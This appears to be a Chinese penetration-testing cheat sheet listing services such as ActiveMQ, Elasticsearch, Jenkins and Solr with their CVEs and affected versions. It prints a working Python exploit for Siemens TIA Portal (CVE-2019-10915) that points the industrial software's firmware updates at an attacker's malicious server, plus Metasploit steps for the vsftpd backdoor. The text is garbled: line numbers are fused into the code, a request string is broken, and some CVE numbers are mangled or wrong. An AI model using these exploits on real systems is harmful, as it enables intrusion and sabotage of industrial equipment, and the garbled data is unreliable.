HFS（文件共享）    HFS远程命令执行 phpmyadmin（mysql数据库管理工具）    phpmyadmin弱密码

phpmoadmin(mongoDB管理工具 )     phpmoadmin远程代码执行 Elasticsearch（搜索服务器） elasticsearch远程命令执行 Elasticsearch未授权访问漏洞 Elasticsearch任意文件读取

"受影响的版本包括：OpenSSL 1.0.1 through 1.0.1gOpenSSL 1.0.0 through 1.0.0lall versions before OpenSSL 0.9.8y openssl（ssl工具包）    DROWN攻击漏洞”（CVE-2016-0800）

ccs注入漏洞 Kubernetes v1.0.x-1.9.x Kubernetes v1.10.0-1.10.10 (fixed in v1.10.11) Kubernetes v1.11.0-1.11.4 (fixed in v1.11.5) Kubernetes v1.12.0-1.12.2 (fixed in v1.12.3)" Kubernetes Kubernetes权限升级漏洞(CVE-2018-1002105)

axis2    axis2弱密码axis2    axis2任意文件读取 "2.2.x3.3.0-3.03"    zabbix    zabbix latest sql注入漏洞zabbix    zabbix jsrpc sql注入漏洞 activemq（中间件）    activemq后台弱密码漏洞activemq（中间件）    activemq远程命令执行activemq（中间件）    activemq任意文件上传漏洞activemq（中间件）    ActiveMQ物理路径泄漏漏洞 Apache ActiveMQ 5.x ~ 5.14.0    activemq（中间件）    ActiveMQ任意文件文件移动漏洞Apache ActiveMQ 5.13.0的版本之前的存在反序列化漏洞    activemq（中间件）61616端口(ActiveMQ消息队列端口)    ActiveMQ反序列化漏洞(CVE-2015-5254)Apache ActiveMQ5.14.0 – 5.15.2    activemq（中间件）    ActiveMQ 信息泄漏漏洞(CVE-2017-15709) Openssh(Open Secure Shell(openssh)是一个安全的登录系统，可以用来替代telnet、rlogin、rcp等)    "ibssh 0.8.x - 0.8.3libssh 0.7.x - 0.7.5libssh 0.6.x"    libssh(ssh工具包)    cve-2018-10933 libssh认证绕过漏洞 grafana（rafana是一个跨平台的开源的度量分析和可视化工具，可以通过将采集的数据查询然后可视化的展示，并及时通知。）    grafana弱密码 hudson（Hudson是Jenkins的前身,它们都是基于Java开发的一种持续集成工具,）    hudson代码泄露漏洞 apache mod_jk    apache mod_jk访问控制绕过漏洞（cve-2018-11759） node.js v8 debugger    node.js v8 debugger 远程命令执行 Fckeditor    "https://www.jianshu.com/p/b0295978da77  /fckeditor/editor/dialog/fck_about.html/FCKeditor/_whatsnew.html"

Openssh

1 CVE-2015-5600  2 CVE-2016-6515  3 CVE-2014-1692 4 CVE-2010-44785 CVE-2016-10009  6 CVE-2016-1908  7 CVE-2015-8325  8 CVE-2016-100129 CVE-2016-10010(提权）

Atlassian

1 CVE-2019-1158

docker

1 CVE-2018-15664

Siemens TIA Portal （STEP7） RCE : CVE-2019-10915

1 ## 2 # Exploit Title: Siemens TIA Portal remote command execution 3 # Date: 06/11/2019 4 # Exploit Author: Joseph Bingham 5 # CVE : CVE-2019-10915 6 # Advisory: https://www.tenable.com/security/research/tra-2019-33 7 # Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a 8 # Affected Vendors/Device/Firmware: 9 #  - Siemens STEP7 / TIA Portal10 ##11 12 ##13 # Example usage14 # $ python cve_2019_10915_tia_portal_rce.py 15 # Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}'16 # Received '40'17 # Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]'18 ##19 20 import websocket, ssl, argparse21 22 parser = argparse.ArgumentParser()23 parser.add_argument("target_host", help="TIA Portal host") 24 parser.add_argument("target_port", help="TIA Portal port (ie. 8888)", type=int) 25 parser.add_argument("update_server", help="Malicious firmware update server IP") 26 args = parser.parse_args()27   28 host = args.target_host29 port = args.target_port30 updatesrv = args.update_server31 ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={
    "cert_reqs": ssl.CERT_NONE})32 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]'33 #req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]'34 req = 42["cli2serv",{
    "moduleFunc":"SoftwareModule.saveUrlSettings","data":{
    "ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]'35 ws.send(req)36 37 result = ws.recv()38 print("Received '%s'" % result)39 40 result = ws.recv()41 print("Received '%s'" % result)42 43 result = ws.recv()44 print("Received '%s'" % result)

 WinRAR

CVE-2018-2025（WinRAR RCE）

1 影响范围：2 3 WinRAR < 5.70 Beta 14 5 Bandizip    < = 6.2.0.06 7 好压(2345压缩)    < = 5.9.8.109078 9 360压缩    < = 4.0.0.1170

ghostscript

1 影响的版本 <= 9.23（全版本、全平台）

CVE-2017-8291

1 Ghostscript Ghostscript < 2017-04-26

 Flash

CVE-2018-4878

1 项目地址：https://github.com/Sch01ar/CVE-2018-4878.git2 3 影响版本为：Adobe Flash Player <= 28.0.0.137

 Office

CVE-2017-11882（RCE）

1 漏洞影响版本：2 Office 3653 Microsoft Office 20004 Microsoft Office 20035 Microsoft Office 2007 Service Pack 36 Microsoft Office 2010 Service Pack 27 Microsoft Office 2013 Service Pack 18 Microsoft Office 2016

vsftpd

1 vsftpd 2.3.4 - 笑脸漏洞2 msfconsole3 search vsftpd4 use exploit/unix/ftp/vsftpd_234_backdoor5 set rhost IP6 run

memcache

常用端口 11211未授权访问

memcache     memcache drdos漏洞（ B6-2018-030102）1.4.31    memcache     Memcached  Append/prepend 远程代码执行漏洞（CVE-2016-8704）1.4.31    memcache     Memcache  Update 远程代码执行漏洞（CVE-2016-8705）1.4.31    memcache     Memcache  SASL身份验证远程代码执行漏洞（CVE-2016-8706）

jenkins

常用端口 8080未授权访问反序列化cve-2017-1000353CVE-2018-1999002

GeoServer

1.弱口令

 Javascript is required to actually use the GeoServer admin console. - 网站没有添加到可信任站点

2.XXE（版本小于2.7.1.1）

 ccproxy

ccproxy6.0远程溢出

solr

未授权访问CVE-2017-12629 XXE & RCECVE-2019-0193 RCE

FasterXML 

Jackson-databind      CVE-2019-12384（RCE)        受影响版本        Jackson-databind 2.X < 2.9.9.1        不受影响版本        Jackson-databind 2.9.9.1        Jackson-databind 2.10